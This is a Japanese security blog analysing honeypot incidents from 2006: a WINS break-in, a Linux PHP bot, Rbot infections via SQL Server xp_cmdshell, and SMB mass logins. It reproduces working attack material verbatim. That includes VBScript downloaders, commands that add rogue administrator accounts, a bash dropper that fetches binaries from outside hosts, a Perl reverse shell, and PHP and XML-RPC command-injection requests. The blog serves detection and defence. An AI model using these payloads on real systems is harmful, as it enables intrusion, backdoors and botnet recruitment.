つぶやき

このブログは,ご覧頂いたあなたのコンピュータが犯罪に利用されていないか?確認していただく為のひとつの手段としてご利用頂ければ幸いです。電子メール:amaterasu@job.email.ne.jp


テーマ:

■攻撃

攻撃はWinsの脆弱性を利用され侵入された。

その後、内部から外部サーバのPort1988へリバースコネクションが張られ、コマンドが実行された。

Severity Time Tag Name Source IP Source Port Target IP Object Name
High 2006-03-16 10:21:29 JST WINS_PointerHijack ***.217.193.170 1209 192.168.37.180 42
Low 2006-03-16 10:21:29 JST TCP_Probe_Other 192.168.37.180 2842 ***.217.193.170 1988

■リバースコネクション

コネクションを接続する事により、以下のコマンドが実行された。

echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe http://***22.10.60/kuo/web/news/new_data/pcshare.exe pcshare.exe
pcshare.exe
pcshare.exe
pcshare.exe
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
cscript iget.vbe http://***22.10.60/kuo/web/news/new_data/pcshare.exe pcshare.exe
pcshare.exe
pcshare.exe
pcshare.exe
cscript iget.vbe http://***22.10.60/kuo/web/news/new_data/vmmrag32.exe vmmrag32.exe
cscript iget.vbe http://***22.10.60/kuo/web/news/new_data/vmmrag32.dll vmmrag32.dll
vmmrag32.exe -run
vmmrag32.exe -run
vmmrag32.exe -run
cscript iget.vbe http://***22.10.60/kuo/web/news/new_data/vmmreg32.dll vmmreg32.dll
rundll32 vmmreg32,DllRegisterServer lsass.exe
rundll32 vmmreg32,DllRegisterServer lsass.exe
rundll32 vmmreg32,DllRegisterServer lsass.exe
rundll32 vmmreg32,DllRegisterServer lsass.exe
rundll32 vmmreg32,DllRegisterServer lsass.exe
rundll32 vmmreg32,DllRegisterServer lsass.exe
cscript dl.vbe http://***22.10.60/kuo/web/news/new_data/se.exe se.exe
se.exe
se.exe
se.exe
cscript iget.vbe http://***22.10.60/kuo/web/news/new_data/ming.exe c:\winnt\msagent\ming.exe
cscript iget.vbe http://***22.10.60/kuo/web/news/new_data/tftip.exe c:\winnt\msagent\tftip.exe
cscript iget.vbe http://***22.10.60/kuo/web/news/new_data/ftip.exe c:\winnt\msagent\ftip.exe
net user guest /active:yes
net user guest mheh84kg
net localgroup Administrators guest /add
net user TsInternetUser mheh84kg
net user TsInternetUser /active:yes
net localgroup administrators TsInternetUser /add
copy net1.exe c:\winnt\msagent\ming.exe
copy tftp.exe c:\winnt\msagent\mitp.exe
copy ftp.exe c:\winnt\msagent\mip.exe
del c:\net.exe /s
del c:\net1.exe /s
del c:\ftp.exe /s
del c:\tftp.exe /s
del c:\cscript.exe /s
del c:\wscript.exe /s
ipconfig /all
exit
Ctrl+C



■影響

administratorのパスワードが変更され、ログインできなくなります。(せつない)

Botnetのコントロール下に置かれる。

AD
いいね!した人  |  リブログ(0)

テーマ:

昨年からLinuxをターゲットとしたボットネットが確認されている。このボットネットは、主にPHPの脆弱性を利用して、ターゲットにコマンドを実行させる。今回は、ボットネットの攻撃の挙動について説明する。



①ターゲットへの攻撃

「Mambo」や「XML-RPC for PHP」の脆弱性を利用した攻撃が行われる。


②攻撃が成功した場合は、以下のperlスクリプトが実行される。

#!/bin/bash
cd /tmp
rm -rf *
rm -rf .*
mkdir .sess_a4c1cb9ea15105441fb0366b06479082
cd .sess_a4c1cb9ea15105441fb0366b06479082
if [ -f cb ]; then
chmod +x cb
./cb ***.31.193.67 8080 &
else
wget ***.222.141.147/studio/images/logo.jpg
mv logo.jpg cb
chmod +x cb
./cb ***.31.193.67 8080 &
fi
if [ -f ping.txt ]; then
perl ping.txt ***.245.233.251 8080 &
else
curl -o ping.txt 81.58.26.26/libsh/ping.txt
perl ping.txt ***.31.193.67 8080 &
fi
if [ -f crond ]; then
rm -rf /tmp/chspsp*
chmod +x crond
export PATH="."
crond
else
wget ***.77.126.41/images/crond
chmod +x crond
export PATH="."
crond
fi
if [ -f crond ]; then
chmod +x crond
export PATH="."
crond
else
curl -o crond ***.77.126.41/images/crond
chmod +x crond
export PATH="."
crond


・スクリプトのダウロードサイト

[http://] ***.24.84.10/chspsp ダウロード可能
[http://] ***.84.105.36/supine ダウロード不可
[http://] ***.170.105.69/supina ダウロード不可
[http://] ***.123.16.34/giculo ダウロード不可
[http://] ***.123.16.34/gicumz  ダウロード不可
[http://] ***.97.113.25/giculz  ダウロード不可


・ping.txt

上記スクリプトが実行され、ping.txtというスクリプトがダウロードされる。

このスクリプトは、任意のIPアドレスに対して接続を行う。


#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");






・cb

上記スクリプトが実行され、cbというツールがダウロードされる。

このスクリプトは、任意のIPアドレスに対して5秒間隔で接続を試みる。

サーバー側で接続セッション数を制限しているものと思われる。

今回は接続が確立された後、SSHのパッケージがダウロードされ、

インストールされた事を確認する。


[root@RedHat7 .sess_a4c1cb9ea15105441fb0366b06479082]# ./cb ***.31.193.67 8080 &[1] 2088
socket ok
error: Connection refused
retring in 5 seconds
socket ok
error: Connection refused
retring in 5 seconds
socket ok
error: Connection refused
retring in 5 seconds
socket ok
error: Connection refused
retring in 5 seconds
socket ok
error: Connection refused
retring in 5 seconds




・crond

上記スクリプトが実行され、crondというツールがダウロードされる。

このツールは、PHPの攻撃コードが含まれている。

実行後、近接IPアドレスに対してPHPの攻撃を開始する。

crondツール解析した結果について説明する。

1)通知メッセージを、UDP ポート 25555 を介して2箇所のリモート IP アドレスへ送信を行う。

***.223.104.152
***.224.174.18


2)以下のパスが生成され、攻撃対象としている。


/cvs/
/articles/mambo/
/cvs/mambo/
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv
/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc/xmlrpc.php



3)攻撃はGetおよびPostコマンドによって実行されている。

GETコマンド
GET %sindex2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS
=&mosConfig_absolute_path=http://***.24.84.10/heade.gif?&cmd
=cd%%20/tmp;wget%%20***.24.84.10/chspsp;chmod%%20744%%20chspsp;./chspsp;echo%%20YYY;echo|
HTTP/1.1\nHost: %s\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)\n\n
※攻撃は「HTTP_Spyki_PhpInclude_Worm」というシグネチャで検知可能です。

Postコマンド
POST /xmlsrv/xmlrpc.php HTTP/1.1
Host: ***.**.***.***
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269

<?xml version="1.0"?><methodCall><methodName>test.method</methodName>
< params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget ***.24.84.10/chspsp;chmod +x chspsp;./chspsp `;echo '_end_';exit;/*</name></value></param></params></methodCall>

※攻撃は「XML_RPC_PHP_CmdExec」というシグネチャで検知可能です。


見方法
攻撃が成功した場合、インターネットへの接続が遅くなります。このような現象を感じた場合は、サーバの/tmpフォルダの下に不明ファイルが存在しないか確認を行います。または、以下のようなプロセスが起動していないか確認を行い、発見した場合は、直ちにプロセスを止め、ファイルを削除することをお勧めします。

root 1189 1090 0 08:54 pts/1 00:00:00 ./cb ***.31.193.67 8080




参照情報

http://www.isskk.co.jp/SOC_report.html

http://www.symantec.com/region/jp/avcenter/venc/data/jp-linux.plupii.html

http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-linux.plupii.a.html

http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-linux.plupii.b.html

http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-linux.plupii.c.html

AD
いいね!した人  |  リブログ(0)

テーマ:

今回のインシデントは、SQLサーバに対するインシデントです。

このサーバは、脆弱なアカウント(SAパスワードなし)を設定していた為、リモートからログインされ

不正にコマンドが実行された形跡を確認しました。詳細な攻撃の手順については、以下をご覧ください。


<不正アクセスの手順>

1)SQLサーバへの不正アクセス

saアカウントを使用して不正アクセスが行われる。

2)コマンドの実行

XP_Comdshellを利用してftpサーバからツールのダウロードが実行される。

Guest login ok, access restrictions apply:ftp> cd /pub/OpenBSD/patches/6250 CWD command successful&ftp> get 2.4.tar.gz8200 PORT command successful150 Opening ASCII mode data connectio

3)ダウロードされたツール名の一覧

2.4.tar.gz
5M.bin
arma5.zip
AV.bat
dx5ger.exe
Fport.exe
latest-defs.exe
ls-lR.gz
merlin.bat
ncurses.tar.gz
patch-2.4.19.gz
pskill.exe
stopav.bat
syss.exe
syss.txt
tlist.exe


・syss.txtの中身

[GLOBAL]
LocalSetupPassword=ZFJUa/HVVx41.
LocalSetupPortNo=6666
ProcessID=844
Version=3.0.0.17
RegistrationKey=HsVRCjxHMe/HwDOrrUxqeMuChKO0DdlzUy2tCGgcdMVQDs/7P9EdwjKrowsPF//h4YObIvknAH/FHA95cfEyb3wzQp2v7UfOzCFEFq722
MaxNrUsers=20
SpeedLimit=1023998976
SocketRcvBuffer=99999
SocketSndBuffer=99999
PacketTimeOut=300
OpenFilesUploadMode=Shared
[DOMAINS]
Domain1=0.0.0.0||6666|lol|1
[Domain1]
User1=webclan|1|0
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0
MaxNrUsers=20
ReplyHello=+++ By WebClan +++
SignOn=c:\WINNT\system32\com\welcome.txt
Signoff=c:\WINNT\system32\com\logout.txt
[USER=webclan|1]
Password=ZFJUa/HVVx41.
HomeDir=c:\
TimeOut=600
MaxNrUsers=10
Maintenance=System
Note1="Wizard generated account"
Access1=M:\|RWAMELCDP
Access2=L:\|RWAMELCDP
Access3=K:\|RWAMELCDP
Access4=J:\|RWAMELCDP
Access5=I:\|RWAMELCDP
Access6=H:\|RWAMELCDP
Access7=G:\|RWAMELCDP
Access8=F:\|RWAMELCDP
Access9=E:\|RWAMELCDP
Access10=D:\|RWAMELCDP
Access11=C:\|RWAMELCDP
Access12=W:\|RWAMELCDP



4)その後、外部のIRCサーバに接続を行う。

08:04 Created
08:04 *** Netzhaeckchen has joined channel #dog-xdcc
08:04 *** Topic for #dog-xdcc : ァ、*~`~*、ァ|ァ、*~`~*、ァ|ァ、*~ -=・-Der kleine DSL-Chan... ワber Hilfe is man sehr erfreut.... Meldet euch bei den OPエs mit dem &.... Auch fservs lpen :) -=・- ~*、ァ|ァ、*~`~*、ァ|ァ、*~`~*、ァ
08:04 *** #dog-xdcc = Netzhaeckchen Killercam +[meeo]-09 &Netzhaeckchen|SleepzzzZZZZzzz +[meeo]-bloedi +[meeo]-02 &spyshot +[meeo]-Musik-03 +[meeo]-10 Sonnenkrieger111 fkr oetzi ~aymeeo|kIsSeN steph Markus MSP +[meeo]-NiCe-1 EKO +slave kingb sonnenschein +[meeo]-NiCe-2 +[meeo]-nulli +[meeo]-03 +[meeo]-08 +[meeo]-NiCe-3 +[meeo]-07 +[meeo]-NiCe &[TaLiBaN]
08:04 <[meeo]-NiCe-3> ** .::-_-::.[H4PpY L33ch!ng l33ゥh3ョ$!].::-_-::. **
08:04 *** Mode #dog-xdcc = +smntr
08:04 <[meeo]-NiCe-3> Total Offered: 3561.2 MB Total Transferred: 7.78 GB
08:04 <[meeo]-NiCe> ** bRought t0 yA bY rIDeRz-CrEW **
08:04 <[meeo]-NiCe> ** 6 packs ** 10 of 10 slots open, Record: 447.9KB/s
08:04 <[meeo]-NiCe> ** Bandwidth Usage ** Current: 0.0KB/s, Record: 508.2KB/s
08:04 <[meeo]-NiCe> ** To request a file, type "/msg [meeo]-NiCe xdcc send #x" **
08:04 <[meeo]-NiCe> ** To request details, type "/msg [meeo]-NiCe xdcc info #x" **
08:04 <[meeo]-NiCe> #1 2x [1.1M] MC LXD ft. KT - G-Town Pt.1.mp3
08:04 <[meeo]-NiCe> #2 8x [2.4M] MC LXD - G-Town Pt.2.mp3
08:04 <[meeo]-NiCe> #3 3x [ 63M] Windows.XP.Wallpapers.zip
08:04 <[meeo]-NiCe> #4 0x [ 95M] VA-Deep_Dance_103-Bootleg-2006-wAx_by_RMC.ace
08:04 <[meeo]-NiCe> #5 1x [3.6M] Mattafix_-_Big_City_Life.mp3
08:04 <[meeo]-NiCe> #6 0x [794M] Scanners_-_uncut_-_RSVCD_-_DVD_Rip_-.mpg
08:04 <[meeo]-NiCe> ** .::-_-::.[H4PpY L33ch!ng l33ゥh3ョ$!].::-_-::. **
08:04 <[meeo]-NiCe> Total Offered: 959.9 MB Total Transferred: 249.85 MB

5)現在も継続して、観察中

AD
いいね!した人  |  リブログ(0)

テーマ:

■コメント

以下のログより、SQLサーバのxp_cmdshellを利用して、不正なファイルのダウロード行為が検知されました。

ウィルスベンダーの情報を調べたところ、W32/Rbot-TLの感染活動だと思われる。


■SQLサーバのログより

EXEC master..xp_cmdshell 'del eq&echo open ***.113.200.210 17808 >> eq&echo user 5777 21584 >> eq &echo get win32.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32.exe&del eq

EXEC master..xp_cmdshell 'del eq&echo open ***.113.213.20 41493 >> eq&echo user 28857 31536 >> eq &echo get win32.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32.exe&del eq
EXEC master..xp_cmdshell 'del eq&echo open ***.113.44.225 12626 >> eq&echo user 6454 10585 >> eq &echo get win32.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32.exe&del eq
EXEC master..xp_cmdshell 'del eq&echo open ***.113.99.152 13754 >> eq&echo user 9511 19386 >> eq &echo get mstsk.exe >> eq &echo quit >> eq &ftp -n -s:eq &mstsk.exe&del eq
EXEC master..xp_cmdshell 'del eq&echo open ***.113.99.152 25502 >> eq&echo user 31359 32087 >> eq &echo get win32.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32.exe&del eq
EXEC master..xp_cmdshell 'del eq&echo open ***.219.133.60 1041 >> eq&echo user 24377 21747 >> eq &echo get firefox.exe >> eq &echo quit >> eq &ftp -n -s:eq &firefox.exe&del eq


■W32/Rbot-TL

W32/Rbot-TL は、Windows OS 用のネットワーク感染型ワームおよび IRC バックドアトロイの木馬です。

ワームは、Windows system フォルダに自身をファイル win32.exe としてコピーします。

W32/Rbot-TL は、セキュリティレベルの低いパスワードのあるコンピュータや SQL サーバーを悪用する、(DCOM-RPC、LSASS、WebDAV、UPNP などの)OS の脆弱性を悪用する、他のワームやトロイの木馬が開くバックドアを使用するなどのさまざまな方法で蔓延します。

ソフォスのウイルス対策製品には、プロアクティブな保護テクノロジーが含まれており、アップデートの必要なく、新たな脅威に対して保護を提供することができます。ソフォスのお客様は、バージョン 3.87 より W32/Rbot-TL(W32/Rbot-Gen として検出)に対して保護されています。

(出展Sophos:http://www.sophos.co.jp/virusinfo/analyses/w32rbottl.html




いいね!した人  |  リブログ(0)

テーマ:

■トレースソース

・IDS

SMBMassLogin


・パケット

...D CKFDENECFDEFFCFGEFFCCACACACACACA. ELEBEOFKEJCACACACACACACACACACAAA..........SMBr.....S......................b..PC NETWORK PROGRAM 1.0..LANMAN1.0..Windows for Workgroups 3.1a..LM1.2X002..LANMAN2.1..NT LM 0.12....U.SMBr.....S.........................2....A...............w\*.!........(...c.H.H$[F..Y.....SMBs.........................@.......A2.......(.........q.NTLMSSP..................................W.i.n.d.o.w.s. .2.0.0.0. .2.1.9.5...W.i.n.d.o.w.s. .2.0.0.0. .5...0........W.SMBs.........................@....W.....,.NTLMSSP.........8..........(................V...........T.E.S.T.-.L.R.0.I.S.3.0.U.A.X.....T.E.S.T.-.L.R.0.I.S.3.0.U.A.X.....T.E.S.T.-.L.R.0.I.S.3.0.U.A.X.....T.E.S.T.-.L.R.0.I.S.3.0.U.A.X.....T.E.S.T.-.L.R.0.I.S.3.0.U.A.X......W.i.n.d.o.w.s . .5...0...W.i.n.d.o.w.s. .2.0.0.0. .L.A.N. .M.a.n.a.g.e.r.....<.SMBs..............................<..A2...................NTLMSSP.........x...............H.......T...
.
.n.......................M.I.N.O.R.U.A.d.m.i.n.i.s.t.r.a.t.o.r.K.A.N.Z.I..&...3..................r#.9...FT{."...S.2..u}...Pa.....c5.....)-W.i.n.d.o.w.s. .2.0.0.0. .2.1.9.5...W.i.n.d.o.w.s. .2.0.0.0. .5...0........#.SMBsm................................'.SMBt.....................................#.SMBt..[.............................


■トレースソース

ハニーネット環境にある。ISS社製のProvenitaによる検知


■シグネチャの説明

SMB_Mass_Login:http://xforce.iss.net/xforce/xfdb/22451


■攻撃の説明

"KANZI"という韓国のクライアントからPort139への大量アクセスを検知しております。

検知内容から、以下のアカウント名を使用してネットワーク共有への接続を確認しました。

Administrator、Guest、TsInternetUser、SQLDebugger

・TsInternetUser アカウントとは?

ターミナル サービス インターネット コネクタ ライセンスによって使用されます。インターネット コネクタ ライセンスが有効な場合、Windows 2000 ベースのサーバーは 1 台で 200 のユーザーから匿名接続のみを許可します。ターミナル サービスのクライアントでは、ログオンのためのダイアログ ボックスが表示されず、クライアントは自動的に TsInternetUser アカウントでログオンされます。


■攻撃のしくみ


■相関分析


■意図的な攻撃の証拠
ハニーネット環境であり、公開されているIPアドレスを利用して業務など行っていない為、

意図的な攻撃であると判断します。


■重要度

ハニーネット環境の為、重要度低


■防御策の提案

・TsInternetUserユーザの無効化 ※インターネットコネクタライセンスを使用していない場合
・「管理ツール」→「コンピュータの管理」
・「ローカルユーザとグループ」→「ユーザ」
・TsInternetUserのプロパティを開いて「アカウントを無効にする」にチェックをつける

■選択問題

■実証コード

■参考資料

いいね!した人  |  リブログ(0)

AD

ブログをはじめる

たくさんの芸能人・有名人が
書いているAmebaブログを
無料で簡単にはじめることができます。

公式トップブロガーへ応募

多くの方にご紹介したいブログを
執筆する方を「公式トップブロガー」
として認定しております。

芸能人・有名人ブログを開設

Amebaブログでは、芸能人・有名人ブログを
ご希望される著名人の方/事務所様を
随時募集しております。